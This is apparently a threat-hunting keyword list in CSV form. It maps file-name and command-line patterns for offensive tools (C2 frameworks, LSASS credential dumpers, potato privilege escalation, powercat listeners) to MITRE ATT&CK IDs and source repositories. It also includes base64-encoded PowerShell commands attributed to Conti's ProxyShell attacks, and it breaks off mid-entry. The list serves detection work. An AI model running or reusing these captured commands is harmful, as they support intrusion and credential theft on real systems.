-*PostRewMsfPostConfInfos.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PotatoTrigger.cpp*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*PotatoTrigger.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*PowerBreach.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerBruteLogon.*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*powercat -c * -p *,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powercat -l -p 
4444*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Powercat.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powerdump.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*powerdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PowerExtract-main.zip*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*PowerForensics*,offensive_tool_keyword,PowerForensics,The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. 
and work has begun on Extended File System and HFS+ support.,T1003 - T1039 - T1046 - T1057,TA0005 - TA0007 - TA0010,N/A,N/A,Information Gathering,https://github.com/Invoke-IR/PowerForensics,1,1,N/A,N/A,10,1324,285,2022-05-20T14:43:10Z,2015-03-07T17:12:19Z -*powerglot.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*powerkatz.dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*powerkatz_x64.dll*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*powerkatz_x86.dll*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*PowerLessShell*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. 
You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*PowerLessShell.py*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*powermad.ps1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad.psd1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad.psm1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Powermad-master*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,1,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z 
-*PowerMemory*,offensive_tool_keyword,PowerMemory,Exploit the credentials present in files and memory,T1003 - T1555 - T1213 - T1558,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/giMini/PowerMemory,1,0,N/A,N/A,9,819,219,2023-05-25T17:58:53Z,2015-08-29T17:09:23Z -*PowerOPS*,offensive_tool_keyword,PowerOPS,PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.,T1059 - T1027 - T1053 - T1129 - T1086,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/fdiskyou/PowerOPS,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powerpick -Command *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*powerpick.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*PowerPick.x64.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z 
-*Powerpreter.psm1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*powerpwn.powerdump*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*powerpwn_tests*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*power-pwn-main*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*PowerSCCM.ps1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM.psd1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - 
TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM.psm1*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerSCCM-master*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*powerseb/PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*powerseb/PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*PowerSharpBinaries*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerSharpPack.ps1*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerSharpPack-master*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*PowerShdll*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,1,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*,greyware_tool_keyword,powershell,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential 
Access,https://github.com/Pennyw0rth/NetExec,1,0,Checking For Hidden Credentials With Appcmd.exe,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #5,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #5,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc 
cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #2,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #6,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc dwBoAG8AYQBtAGkA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #1,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell 
-enc 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*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #3,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -enc QwBvAHAAeQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAYwB1AHIAcgBlAG4AdABcAHQAaABlAG0AZQBzAFwAUgBlAHMAbwB1AHIAYwBlAEgAYQBuAGQAbABlAHIALgBhAHMAcAB4ACIAIAAtAEYAbwByAGMAZQA7AHMAYwAgAC0AcABhAHQAaAAgAGMAOgBcAGkAbgBlAHQAcAB1AGIAXAB3AHcAdwByAG8AbwB0AFwAYQBzAHAAbgBlAHQAXwBjAGwAaQBlAG4AdABcAHQAZQBzAHQALgB0AHgAdAAgAC0AdgBhAGwAdQBlACAAKABpAGUAeAAoACcAbABzACAAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABjAHUAcgByAGUAbgB0AFwAdABoAGUAbQBlAHMAXAAiACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #4,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell IEX (New-Object 
